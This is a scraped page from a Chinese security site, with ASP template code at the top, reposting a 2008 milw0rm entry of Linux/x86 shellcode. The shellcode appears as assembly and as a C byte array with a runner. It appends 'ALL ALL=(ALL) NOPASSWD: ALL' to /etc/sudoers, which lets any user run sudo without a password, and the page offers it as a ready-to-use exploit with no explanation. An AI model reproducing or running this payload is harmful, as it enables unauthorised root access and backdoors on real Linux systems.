<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("x05,int") PageTitle=stripHTML("linux/x86 edit /etc/sudoers for full access 86 bytes") ArticleIntro=stripHTML("77169.com小编引言:linux/x86 edit /etc/sudoers for full access 86 bytes,漏洞的主要原因:") Articlecontent=stripHTML("/*
Author: Rick
Email: rick2600@hotmail.com

OS: Linux/x86
Description: Anyone c…") ModuleName = stripHTML("exploits") InfoID = stripHTML("139039") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> linux/x86 edit /etc/sudoers for full access 86 bytes - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> shellcode >> 正文

linux/x86 edit /etc/sudoers for full access 86 bytes

2008/11/17 作者:不祥 来源: 互联网
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>

/*
Author: Rick
Email: rick2600@hotmail.com

OS: Linux/x86
Description: Anyone can run sudo without password

section .text
global _start

_start:

;open(/etc/sudoers, O_WRONLY | O_APPEND);
xor eax, eax
push eax
push 0x7372656f
push 0x6475732f
push 0x6374652f
mov ebx, esp
mov cx, 0x401
mov al, 0x05
int 0x80

mov ebx, eax

;write(fd, ALL ALL=(ALL) NOPASSWD: ALL\n, len);
xor eax, eax
push eax
push 0x0a4c4c41
push 0x203a4457
push 0x53534150
push 0x4f4e2029
push 0x4c4c4128
push 0x3d4c4c41
push 0x204c4c41
mov ecx, esp
mov dl, 0x1c
mov al, 0x04
int 0x80

;close(file)
mov al, 0x06
int 0x80

;exit(0);
xor ebx, ebx
mov al, 0x01
int 0x80

*/

#include <stdio.h>
#include <string.h>

char code[] =
\x31\xc0\x50\x68\x6f\x65\x72\x73\x68\x2f\x73\x75\x64
\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x01\x04\xb0\x05
\xcd\x80\x89\xc3\x31\xc0\x50\x68\x41\x4c\x4c\x0a\x68
\x57\x44\x3a\x20\x68\x50\x41\x53\x53\x68\x29\x20\x4e
\x4f\x68\x28\x41\x4c\x4c\x68\x41\x4c\x4c\x3d\x68\x41
\x4c\x4c\x20\x89\xe1\xb2\x1c\xb0\x04\xcd\x80\xb0\x06
\xcd\x80\x31\xdb\xb0\x01\xcd\x80;

void main(void) {

void (*shellcode)() = code;
shellcode();

}

// milw0rm.com [2008-11-19]